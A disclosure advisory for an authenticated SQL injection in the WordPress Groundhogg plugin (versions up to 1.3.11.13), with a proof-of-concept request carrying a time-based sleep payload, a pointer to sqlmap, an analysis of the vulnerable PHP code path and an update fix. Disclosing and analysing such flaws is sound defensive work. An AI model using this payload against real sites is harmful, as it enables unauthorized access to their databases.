Wordpress Groundhogg <= 1.3.11.13 Authentificated SQL Injection

Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

Intial submission of the vulnerability

# Exploit Title: Wordpress Groundhogg <= 1.3.11.13 Authenticated SQL Injection Vulnerability
# Date: 23-10-2019
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Webiste: https://nitesculucian.github.io
# Vendor Homepage: https://www.groundhogg.io/
# Software Link: https://wordpress.org/plugins/groundhogg/
# Version: 1.3.11.13
# Tested on: Ubuntu 18.04 / Wordpress 5.3
 
1. Description:  
 
Wordpress Groundhogg plugin with a version lower than 1.3.11.13 is affected by an Authenticated SQL Injection vulnerability.

2. Proof of Concept: 
 
Authenticated SQL Injection:
- Using an Wordpress user, access <your target> /wp-admin/admin.php?page=gh_bulk_jobs&action=gh_export_contacts&optin_status%5B0%5D=(select*from(select(sleep(20)))a)&optin_status%5B1%5D=0
- The response will be returned after 20 seconds proving the successful exploitation of the vulnerability.
- Sqlmap can be used to further exploit the vulnerability.

Detailed analysis of the vulnerability

The function from /wp-content/plugins/groundhogg/includes/admin/tools/class-wpgh-export-bulk-job.php from lines 38-51 is accepting arbitrary user-supplied data as follows:

public function query($items)
{
    if ( ! current_user_can( 'export_contacts' ) ){
        return $items;
    }

    $query = new WPGH_Contact_Query();
    $args = $_GET;

    $contacts = $query->query( $args );
    $ids = wp_list_pluck( $contacts, 'ID' );

    return $ids;
}

The line containing $contacts = $query->query( $args ); allows unsanitised user input within the following function from /wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php lines 279-284:

public function query( $query ) {
    $this->query_vars = wp_parse_args( $query );
    $items = $this->get_items();

    return $items;
}

Finaly the unsinitised query is perfomed on wp-content/plugins/groundhogg/includes/class-wpgh-contact-query.php at line 430 ( WPGH_Contact_Query->query_items() ):

$results       = $wpdb->get_results( $this->request );

return $results;

How to fix

Update to the latest available version of the Groundhogg plugin.

Public appearances

  • tba

Other references

  • tba